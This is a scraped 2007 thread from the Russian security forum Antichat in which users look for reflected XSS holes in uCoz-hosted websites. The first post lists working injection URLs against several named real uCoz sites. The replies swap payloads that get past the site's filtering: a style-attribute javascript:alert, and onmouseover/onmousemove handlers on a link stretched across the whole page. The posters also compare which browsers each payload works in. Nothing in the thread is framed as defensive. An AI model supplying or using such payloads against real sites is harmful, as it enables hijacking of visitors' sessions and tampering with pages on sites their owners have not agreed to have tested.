ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу XSS в ucoz?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в ucoz?
  #1  
Старый 24.10.2007, 20:21
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


Question XSS в ucoz?
re2all

Ну... В общем такая штука есть везде как я посомтрел и понял
Вот случайно выбрал пару сайтов
_http://cs.ucoz.ru/forum/5"><h1>Hello
_http://levitski.clan.su/index/34-13"><h1>Hello
_http://muonline.ucoz.ru/forum/2-2-1"><h1>Hello
_http://ucoz.ucoz.ru/news/2006-11-08-17"><h1>Hello
Вот, работает, но если прописать <script> ... </script> ему не понравится символ /
Возможно-ли это обойти?
Offtop: Прошу не бить если не туда выложил, более подходяшего места не нащёл
Последний раз редактировалось Ponchik; 24.10.2007 в 20:28..
 
Ответить с цитированием

  #2  
Старый 24.10.2007, 22:30
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925

Репутация: 6
По умолчанию
Код:
_http://cs.ucoz.ru/forum/5%22style="background:url(javascript:alert('ok'))
работает только в IE
 
Ответить с цитированием

  #3  
Старый 24.10.2007, 22:31
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925

Репутация: 6
По умолчанию
http://old.antichat.ru/crackchat/HTML/
тебе в помощь
 
Ответить с цитированием

  #4  
Старый 24.10.2007, 23:02
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию
Цитата:
http://cs.ucoz.ru/forum/5%22style=%22visibility:none;width:100%25;height:1 00%25;%22onmouseover=%22alert(0)
проверял в опере..думаю работает везде

%25 надо заменить на что-нибдуь другое

Цитата:
http://cs.ucoz.ru/forum/5%22style=%22display:block;position:absolute;visib ility:none;width:300;height:300;%22onmouseover=%22 alert(0)
Последний раз редактировалось inv; 24.10.2007 в 23:06..
 
Ответить с цитированием

  #5  
Старый 25.10.2007, 00:35
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925

Репутация: 6
По умолчанию
onmouseover мне не нравится =\
 
Ответить с цитированием

  #6  
Старый 25.10.2007, 00:37
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию
чем
 
Ответить с цитированием

  #7  
Старый 25.10.2007, 01:18
Cawabunga
Постоянный
Регистрация: 16.04.2007
Сообщений: 458
Провел на форуме:
2722721

Репутация: 364
Отправить сообщение для Cawabunga с помощью ICQ
По умолчанию
Цитата:
чем
Не напрягайся он тупо посты набивает! (:
Последний раз редактировалось calintz; 25.10.2007 в 01:20.. Причина: Ошибка млять!
 
Ответить с цитированием

  #8  
Старый 25.10.2007, 01:49
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925

Репутация: 6
По умолчанию
calintz
ты еще скажи что я дату регистрации подкрутил.
хочется показаться умным... постарайся себя пересилить

inv
первый способ только при наведении на ссылку. собственно этим и не нравится, блок не обрабатывается
второй способ - опера игнорит
 
Ответить с цитированием

  #9  
Старый 25.10.2007, 02:00
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию
visibility:none;width:300;height:300; тебе это не о чем не говорит?ссылку можно растянуть на весь броузер

единственное токо я перепутал onmouseover c onmousemove

Поэтому я честно говоря не вижу что тут может не нравится?=)
п с я все тестил в опере (смотреть надо только второй вариант)
насчет не обрабаывается - незабываем удалять пробелы получаемые после вставки кода на форуме
Последний раз редактировалось inv; 25.10.2007 в 02:13..
 
Ответить с цитированием

  #10  
Старый 25.10.2007, 16:05
$aSH
Новичок
Регистрация: 15.05.2006
Сообщений: 20
Провел на форуме:
58925

Репутация: 6
По умолчанию
во, точно. а я смотрю чтото не то...

зы. не поверишь, говорит
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ